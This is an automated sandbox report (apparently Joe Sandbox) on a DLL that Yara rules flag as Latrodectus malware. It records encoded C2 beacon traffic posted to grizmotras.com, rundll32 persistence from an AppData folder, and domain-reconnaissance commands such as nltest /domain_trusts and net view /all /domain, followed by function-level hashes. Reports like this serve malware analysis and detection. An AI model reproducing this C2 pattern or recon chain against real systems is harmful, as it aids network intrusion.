2024-04-25 20:44:44 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 39 6a 6c 32 61 36 39 74 4f 6c 4c 57 58 38 56 62 36 47 37 53 49 73 78 61 54 33 6d 38 49 50 37 77 54 52 63 70 57 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiC09jl2a69tOlLWX8Vb6G7SIsxaT3m8IP7wTRcpWBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-25 20:44:58 UTC	568	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0AjacScs1G8KdHCe9xFKZ1lr3bZO8mAJoCCe8nZkLePDrb8NEYH2mgvKHCE2NZjUV3w5bwAJUGqTdXYi7BJiu5kxQ7j8CfTOvw%2BiSvk5s7JqFHfAaFM3Fq4dzHCtf4xOHV3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12c3bc899b03c-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:44:58 UTC	162	IN	Data Raw: 39 63 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 69 7a 64 35 5a 48 39 71 74 56 32 58 35 45 38 74 46 4a 69 39 2b 4d 6e 69 58 44 36 41 4a 55 75 7a 5a 4f 2b 2b 42 47 72 63 6e 41 3d 3d 0d 0a Data Ascii: 9cQhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnA==
2024-04-25 20:44:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49730	172.67.219.28	443	2928	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:44:59 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-25 20:44:59 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 39 6a 6c 32 61 36 39 74 4f 6c 4c 57 58 38 56 62 36 47 37 53 49 73 78 61 54 33 6d 38 49 50 37 77 54 52 63 70 57 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d Data Ascii: YjOeEyiMk3RvE5vcC/HWCbEd2NSiC09jl2a69tOlLWX8Vb6G7SIsxaT3m8IP7wTRcpWBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==
2024-04-25 20:45:08 UTC	578	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:45:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23druerxa5DplfL8GVCqruSPNU1h9p73M4yL8EAXBKD23G4vDykH0P6agZTd8YbOO8Vs%2B3BFNxouf3oJMW2kOesWcWphPQP4i%2B8YJcznRVe9Lor%2FVVnsic7AI%2BvhbHzjAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a12c98ea33b0a0-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:45:08 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-25 20:45:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	22:42:55
Start date:	25/04/2024
Path:	C:\Windows\System32\loaddll64.exe
Wow64 process (32bit):	false
Commandline:	loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
Imagebase:	0x7ff7b89e0000
File size:	165'888 bytes
MD5 hash:	763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:42:55
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:42:55
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Imagebase:	0x7ff607be0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:42:55
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
Imagebase:	0x7ff71abb0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.2158647911.0000026C61E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.2158630473.0000026C61E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:42:55
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
Imagebase:	0x7ff71abb0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000004.00000002.2040445129.0000020342FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000004.00000002.2040526568.00000203431C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:42:55
Start date:	25/04/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5572 -s 452
Imagebase:	0x7ff6f3150000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:42:56
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_79066994.dll", #1
Imagebase:	0x7ff71abb0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.3284037566.0000022380120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000003.2909305037.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.3283619847.000000A88ED78000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000003.2979519134.0000022380230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000003.3110926112.0000022380230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.3284079772.0000022380130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.3284387768.0000022381EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000003.2856557891.0000022380230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	22:42:58
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
Imagebase:	0x7ff71abb0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:43:01
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
Imagebase:	0x7ff71abb0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:43:06
Start date:	25/04/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5572 -s 472
Imagebase:	0x7ff6f3150000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:44:57
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c ipconfig /all
Imagebase:	0x7ff607be0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:44:57
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:44:57
Start date:	25/04/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff707600000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:44:57
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c systeminfo
Imagebase:	0x7ff607be0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:44:57
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:44:57
Start date:	25/04/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff72d970000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:44:58
Start date:	25/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts
Imagebase:	0x7ff607be0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts
Imagebase:	0x7ff69bc90000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts /all_trusts
Imagebase:	0x7ff607be0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts /all_trusts
Imagebase:	0x7ff69bc90000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all /domain
Imagebase:	0x7ff607be0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	22:44:59
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	22:45:00
Start date:	25/04/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all /domain
Imagebase:	0x7ff6feb10000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	31
Total number of Limit Nodes:	1

Executed Functions

Function 0000000180070044 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 116
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000001800701F6

Strings

MN(U, xrefs: 0000000180070078
)RxR, xrefs: 0000000180070080
pOdy, xrefs: 0000000180070070
w, xrefs: 0000000180070088
k, xrefs: 0000000180070093
S5Xl, xrefs: 0000000180070068

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: )RxR$MN(U$S5Xl$k$pOdy$w
API String ID: 4275171209-2056616801
Opcode ID: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
Instruction ID: 4deb1cea13ac9b666c555f1b3f310a4baaf57dd73fee47670c94506e3a1fa1fc
Opcode Fuzzy Hash: 47ca1b1a687d22c07fda4f8fc03cbaa4417bc6c6b16434333d34d95eb6fff843
Instruction Fuzzy Hash: 78413772705648C6EBA68F21E004B9E7BB1F348BC8FA4C115EE4947B89CB7EC649C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800701F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000001800701F6
VirtualAlloc.KERNELBASE ref: 000000018007026A

Strings

S5Xl, xrefs: 0000000180070240

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: S5Xl
API String ID: 4275171209-3963265540
Opcode ID: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
Instruction ID: 8627bea6adcabeb617a02013d3036f8ce64dc83beb87997f1cd45eda72222d63
Opcode Fuzzy Hash: 955a37318a42581a82527350a65807328e5baf708e28549c0701e7bd005047f0
Instruction Fuzzy Hash: B63146733116A886CB56CF75A548FEC3BAAF718BC8F5281268E4D07B55DE39C11AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070210 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 59
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000000018007026A

Strings

S5Xl, xrefs: 0000000180070240

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: S5Xl
API String ID: 4275171209-3963265540
Opcode ID: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
Instruction ID: cfc6a34ce132622bae8ceb4dc72cd21c5819cecda536a8dbeac765b14806de91
Opcode Fuzzy Hash: 890a37e0230ef105c6c23fffcb61ff4111ea649d379bd8e7c52efb5e0244a4c1
Instruction Fuzzy Hash: 691106723217A885CE61CF35A54CFA82BA9F71CFC8F1691158E4D13B01DE39C019C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001AE64 Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::exception_ptr::exception_ptr.LIBCONCRT ref: 000000018001AEFB
std::_XGetLastError.LIBCPMT ref: 000000018001AF0A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLaststd::_std::exception_ptr::exception_ptr
String ID:
API String ID: 1155811620-0
Opcode ID: 2a9c38afd83d8c400890383e43e41c3aafc3bdcb764982a53af39c40d3923482
Instruction ID: 389c6b3ebaf6b75f4d52dadf3eb5adb451314a2da240c59f195eb1b860b11b29
Opcode Fuzzy Hash: 2a9c38afd83d8c400890383e43e41c3aafc3bdcb764982a53af39c40d3923482
Instruction Fuzzy Hash: 6A115171B00B0999FB82DBA0DC853DD37B4A7493A8F504616FA29566D6DF20C78DC340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800701E0 Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00000001800701F6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
Instruction ID: fdd3b53fd5ef90cd25e79b7e67ac9ef4d4291e3d36f58b03b6eae1744e84b5e2
Opcode Fuzzy Hash: 121f1415670ded573bb7e3f76694802e64cce90aa816079046d2fabcf07b22fa
Instruction Fuzzy Hash: 42C01262B0D6D049D7056B7420A469E2FB16762789B05405A4B4163E69C8388206C704

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00000001800033E0 Relevance: 95.4, APIs: 52, Strings: 2, Instructions: 931filememoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180003442
memset.MSVCRT ref: 0000000180003458
memset.MSVCRT ref: 0000000180003469
memset.MSVCRT ref: 000000018000347A
CreateFileW.KERNEL32 ref: 00000001800034CA
GetFileInformationByHandle.KERNEL32 ref: 00000001800034EA
ReadFile.KERNEL32 ref: 0000000180003538
ReadFile.KERNEL32 ref: 00000001800035C5
CoTaskMemAlloc.OLE32 ref: 00000001800035E2
ReadFile.KERNEL32 ref: 000000018000360E
CoTaskMemFree.OLE32 ref: 000000018000365D
SetFilePointer.KERNEL32 ref: 00000001800036AF
ReadFile.KERNEL32 ref: 00000001800036DC
SetFilePointer.KERNEL32 ref: 0000000180003711
ReadFile.KERNEL32 ref: 0000000180003750
SetFilePointer.KERNEL32 ref: 00000001800037C7
ReadFile.KERNEL32 ref: 0000000180003D59
GetLastError.KERNEL32 ref: 000000018000418D
FreeLibrary.KERNEL32 ref: 00000001800041A1
CloseHandle.KERNEL32 ref: 00000001800041B3
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800041C6
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800041D9
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800041E7
